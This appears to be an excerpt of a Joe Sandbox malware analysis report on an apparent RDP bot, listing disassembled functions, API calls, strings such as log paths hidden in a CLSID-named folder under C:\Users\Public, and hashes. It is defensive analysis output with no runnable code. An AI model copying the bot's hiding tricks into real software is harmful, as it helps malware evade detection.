Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log
API String ID: 513531256-1022500615
Opcode ID: 6d63ff14d14e77d7d9893b7cf131dd796ece7ae35e9587e97000a2984af39abb
Instruction ID: f3c1ae03af07e628172fc752b1c7a554f0c613b1a057ac218881e9cab8e22ad9
Opcode Fuzzy Hash: 6d63ff14d14e77d7d9893b7cf131dd796ece7ae35e9587e97000a2984af39abb
Instruction Fuzzy Hash: 2C416E72A0CA8686F731AF55E8543B933A1FB88780F440131DA8D477B6CF6CE5858F40

Function 00007FFE0EBD1292 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FFE0EBD133E
fflush.MSVCRT ref: 00007FFE0EBD134A
EnterCriticalSection.KERNEL32 ref: 00007FFE0EBD1363
LeaveCriticalSection.KERNEL32 ref: 00007FFE0EBD138B
CopyFileA.KERNEL32 ref: 00007FFE0EBD13E8

Strings

., xrefs: 00007FFE0EBD13CD
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log, xrefs: 00007FFE0EBD13AB
1, xrefs: 00007FFE0EBD13D2

Memory Dump Source

Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true

Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log
API String ID: 513531256-2601447032
Opcode ID: 1a7e9c9ec7bae933ecc4019bc3fe970f4cd41a9ad4663795c4800373867ad189
Instruction ID: 22d3a8711bb827171cba83affd83525ac5af9c183e10a8763ca389fbd672ae26
Opcode Fuzzy Hash: 1a7e9c9ec7bae933ecc4019bc3fe970f4cd41a9ad4663795c4800373867ad189
Instruction Fuzzy Hash: F8414921A0D68286F3309F19E8543B966A0FB88784F540035DACD87BAADF3DA6858F40

Function 00007FFE0EC02FD2 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FFE0EC0307E
fflush.MSVCRT ref: 00007FFE0EC0308A
EnterCriticalSection.KERNEL32 ref: 00007FFE0EC030A3
LeaveCriticalSection.KERNEL32 ref: 00007FFE0EC030CB
CopyFileA.KERNEL32 ref: 00007FFE0EC03128

Strings

1, xrefs: 00007FFE0EC03112
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log, xrefs: 00007FFE0EC030EB
., xrefs: 00007FFE0EC0310D

Memory Dump Source

Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true

Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log
API String ID: 513531256-2729875187
Opcode ID: b0e16de90528dddbaa36a4a9c88e4def37decd2482aa2aa138530108e3277cd1
Instruction ID: 6b2797ab815aff8d8be3cf07e0090f65078692455e54ea7e827fe3c1b393f27a
Opcode Fuzzy Hash: b0e16de90528dddbaa36a4a9c88e4def37decd2482aa2aa138530108e3277cd1
Instruction Fuzzy Hash: 2941B271A0C6C1A6F320DB55E8D53BA6351BB8A784F500075EA8D837B5DF3EE9858B02

Function 00007FFE0E161292 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FFE0E16133E
fflush.MSVCRT ref: 00007FFE0E16134A
EnterCriticalSection.KERNEL32 ref: 00007FFE0E161363
LeaveCriticalSection.KERNEL32 ref: 00007FFE0E16138B
CopyFileA.KERNEL32 ref: 00007FFE0E1613E8

Strings

1, xrefs: 00007FFE0E1613D2
., xrefs: 00007FFE0E1613CD
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log, xrefs: 00007FFE0E1613AB

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log
API String ID: 513531256-2115573132
Opcode ID: 5c96a4841fcf32cb0990ea46f84c34129a0b230b4ef58bcda0142fca1c46c413
Instruction ID: 51df0ccf804abd66d1a12af380f48a0e065f8e79715e52f53c7d2a931c677085
Opcode Fuzzy Hash: 5c96a4841fcf32cb0990ea46f84c34129a0b230b4ef58bcda0142fca1c46c413
Instruction Fuzzy Hash: 7D412A61A0D68686F220AB11F8543B97361BF89B80F540036DACE97BB6CF3DE586C740

Function 00007FFE1150C780 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 70COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE1150C81E
_errno.MSVCRT ref: 00007FFE1150C83C
_errno.MSVCRT ref: 00007FFE1150C844

Strings

[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE1150C86C
ini_get_uint16, xrefs: 00007FFE1150C7FD, 00007FFE1150C865
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE1150C7EF
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1150C804
(value != NULL), xrefs: 00007FFE1150C7F6

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: _errno
String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
API String ID: 2918714741-1951032453
Opcode ID: bf1d470dad7813b6eb82becc460bb75d3bd86b9cfb0f4c6d0da023c0a12cc4cf
Instruction ID: 57769db1af62037c51d1ca51dd1d1245de97f98c06afe63c555d78d739987fb1
Opcode Fuzzy Hash: bf1d470dad7813b6eb82becc460bb75d3bd86b9cfb0f4c6d0da023c0a12cc4cf
Instruction Fuzzy Hash: 28219522A08F4796E7219F56E8807AA7369BB457E8F4440B9EE4C47B74DF7CE845C700

Function 00007FFE1150C900 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE1150C99A
_errno.MSVCRT ref: 00007FFE1150C9B8
_errno.MSVCRT ref: 00007FFE1150C9C4

Strings

[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE1150C9EB
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE1150C96B
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1150C980
ini_get_uint32, xrefs: 00007FFE1150C979, 00007FFE1150C9E4
(value != NULL), xrefs: 00007FFE1150C972

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: _errno
String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
API String ID: 2918714741-719680006
Opcode ID: 2e8051d9b5b72b6684ba0facfc9a1ee98fcb759099fd11aa89b7a5be63974849
Instruction ID: f26bef06008ea366f88f9764a1397b4cdcc38c5c34dc68e858f94d73bd28dd23
Opcode Fuzzy Hash: 2e8051d9b5b72b6684ba0facfc9a1ee98fcb759099fd11aa89b7a5be63974849
Instruction Fuzzy Hash: BC217162A08E4296E7619F56E8807AA3369FB457A4F4440B6EE4C47674DF3DE845C700

Function 00007FF6BFD630B1 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 123fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32 ref: 00007FF6BFD6314F
GetLastError.KERNEL32 ref: 00007FF6BFD6316A

Part of subcall function 00007FF6BFD699E2: fwrite.MSVCRT ref: 00007FF6BFD69A8E
Part of subcall function 00007FF6BFD699E2: fflush.MSVCRT ref: 00007FF6BFD69A9A

Strings

fs_file_copy, xrefs: 00007FF6BFD6311E, 00007FF6BFD63181, 00007FF6BFD632CF
[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu), xrefs: 00007FF6BFD63188
NULL, xrefs: 00007FF6BFD632AD, 00007FF6BFD632B9
[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d), xrefs: 00007FF6BFD632D6
[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x), xrefs: 00007FF6BFD63125

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: CopyErrorFileLastfflushfwrite
String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
API String ID: 2887799713-3464183404
Opcode ID: fb76c954d88b9053ab83afff5c59a0901bb37d9f6299ae46d9521e7db8808081
Instruction ID: c0176d2dd5c4f357d73bd75045303cef787900c2165e245b8b622a0beee001c4
Opcode Fuzzy Hash: fb76c954d88b9053ab83afff5c59a0901bb37d9f6299ae46d9521e7db8808081
Instruction Fuzzy Hash: 94414C51A0C616A1FB205ACEA40037977547F05BCCE544732EB0FCA7B0EE6EEAA5D381

Function 00007FF6BFD62AE5 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 98fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?,?,?,?,00007FF6BFD63833), ref: 00007FF6BFD62AFC
GetLastError.KERNEL32 ref: 00007FF6BFD62B53

Strings

[I] (%s) -> Done(path=%s), xrefs: 00007FF6BFD62C98
fs_file_delete, xrefs: 00007FF6BFD62B35, 00007FF6BFD62B61, 00007FF6BFD62C91
[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu), xrefs: 00007FF6BFD62B68
NULL, xrefs: 00007FF6BFD62C82
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6BFD62B3C

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
API String ID: 2018770650-4119452840
Opcode ID: 4c36aa7f3b25613b573234c00697934ff3ebae5c5bc87abfb6daebd341cfa17f
Instruction ID: 0d504f43b7d38c80e891414669ff8bd15b6427950ed1946062a7fcc483c7a4bf
Opcode Fuzzy Hash: 4c36aa7f3b25613b573234c00697934ff3ebae5c5bc87abfb6daebd341cfa17f
Instruction Fuzzy Hash: 39311C51F0C60761FE205E8CA4553BD33409F58796F154B32EB1ECBAB9AD3CA98593C2

Function 00007FFE1150219D Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 66networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 00007FFE115021EB
WSAGetLastError.WS2_32 ref: 00007FFE115021FA

Strings

tcp_recv, xrefs: 00007FFE11502257
tcp_send, xrefs: 00007FFE11502206, 00007FFE11502237
[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFE1150225E
[E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d), xrefs: 00007FFE1150223E
[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE1150220D

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLastsend
String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
API String ID: 1802528911-690514478
Opcode ID: b9325ee79a2b188466f86b99841bc5c96000ee70e936f5ce4159d23ac9abe904
Instruction ID: 3b354cd8d100b1925b43de66ba60dc15fb22244c62a97d1ffc122d30e5af7e71
Opcode Fuzzy Hash: b9325ee79a2b188466f86b99841bc5c96000ee70e936f5ce4159d23ac9abe904
Instruction Fuzzy Hash: 442132A5B18D4391E72247EBB8806BC264ABF157F0F4453B8DC3D47AF1CE2CA5468300

Function 00007FFE13301CBD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 66networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 00007FFE13301D0B
WSAGetLastError.WS2_32 ref: 00007FFE13301D1A

Strings

[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFE13301D7E
[E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d), xrefs: 00007FFE13301D5E
[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE13301D2D
tcp_send, xrefs: 00007FFE13301D26, 00007FFE13301D57
tcp_recv, xrefs: 00007FFE13301D77

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: ErrorLastsend
String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
API String ID: 1802528911-690514478
Opcode ID: e641228a5d57032de7d3a43c2c3a71ad25244e0471c0a3e277a8c55d2bd63119
Instruction ID: 0d9f27cad773af886b4b7a8d0c9abcb635e47fdfa6750bda5580da1d6044bf9a
Opcode Fuzzy Hash: e641228a5d57032de7d3a43c2c3a71ad25244e0471c0a3e277a8c55d2bd63119
Instruction Fuzzy Hash: 8A21F655F28D138AF6204B17A9406BC9241AF357F0F5403B1ED7C6BAF6CE2CA4059308

Function 00007FFE11501824 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE1150184C
setsockopt.WS2_32 ref: 00007FFE11501878
WSAGetLastError.WS2_32 ref: 00007FFE1150188F
WSAGetLastError.WS2_32 ref: 00007FFE115018B4

Strings

tcp_set_timeo, xrefs: 00007FFE1150189F, 00007FFE115018C4
[E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE115018CB
[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE115018A6

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
API String ID: 1729277954-887953274
Opcode ID: f865cf548c056a74205e5b0bce117a0b920f0171c07566af664b5b3d4fc6a94a
Instruction ID: f387d8bac6cedbcda1626f49d95a6b99484b28ef1e32670194654777fabe0b2d
Opcode Fuzzy Hash: f865cf548c056a74205e5b0bce117a0b920f0171c07566af664b5b3d4fc6a94a
Instruction Fuzzy Hash: 1D11C871A0894286F310AB67F8401BA7665FF88760F104375EA6E837B4DF7CD64ACB01

Function 00007FFE13301344 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE1330136C
setsockopt.WS2_32 ref: 00007FFE13301398
WSAGetLastError.WS2_32 ref: 00007FFE133013AF
WSAGetLastError.WS2_32 ref: 00007FFE133013D4

Strings

[E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE133013EB
[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE133013C6
tcp_set_timeo, xrefs: 00007FFE133013BF, 00007FFE133013E4

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
API String ID: 1729277954-887953274
Opcode ID: 9a489855aa47a064eb53d80e0741d6a20afcea4c8e718cf091384bc24f6a8843
Instruction ID: 27efb3ef4fb7fede86cb3ab647988727855453ff75c62771fa9c01ed07f3d756
Opcode Fuzzy Hash: 9a489855aa47a064eb53d80e0741d6a20afcea4c8e718cf091384bc24f6a8843
Instruction Fuzzy Hash: 9711B971E08942CEF3109B27F800469A650FFA87A0F504276E97DA3BB5DF7CD50A8B04

Function 00007FFE0EB44CD4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE0EB44CFC
setsockopt.WS2_32 ref: 00007FFE0EB44D28
WSAGetLastError.WS2_32 ref: 00007FFE0EB44D3F
WSAGetLastError.WS2_32 ref: 00007FFE0EB44D64

Strings

tcp_set_timeo, xrefs: 00007FFE0EB44D4F, 00007FFE0EB44D74
[E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0EB44D7B
[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0EB44D56

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
API String ID: 1729277954-887953274
Opcode ID: 5b33547d2e8b2079c483bff5ae4c0ca30c3b29f38f34b3308c77c28b13d9fdbb
Instruction ID: 50d617040d8d4fb8e9c0884c514436c2805cb0120ae249172947cb8794f4c380
Opcode Fuzzy Hash: 5b33547d2e8b2079c483bff5ae4c0ca30c3b29f38f34b3308c77c28b13d9fdbb
Instruction Fuzzy Hash: 8D1142B2A1864796E334AF19E80067A77A0EF88754F504235E9AE83BB4DF7CD549CF00

Function 00007FFE0EBD2154 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE0EBD217C
setsockopt.WS2_32 ref: 00007FFE0EBD21A8
WSAGetLastError.WS2_32 ref: 00007FFE0EBD21BF
WSAGetLastError.WS2_32 ref: 00007FFE0EBD21E4

Strings

[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0EBD21D6
tcp_set_timeo, xrefs: 00007FFE0EBD21CF, 00007FFE0EBD21F4
[E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0EBD21FB

Memory Dump Source

Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true

Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
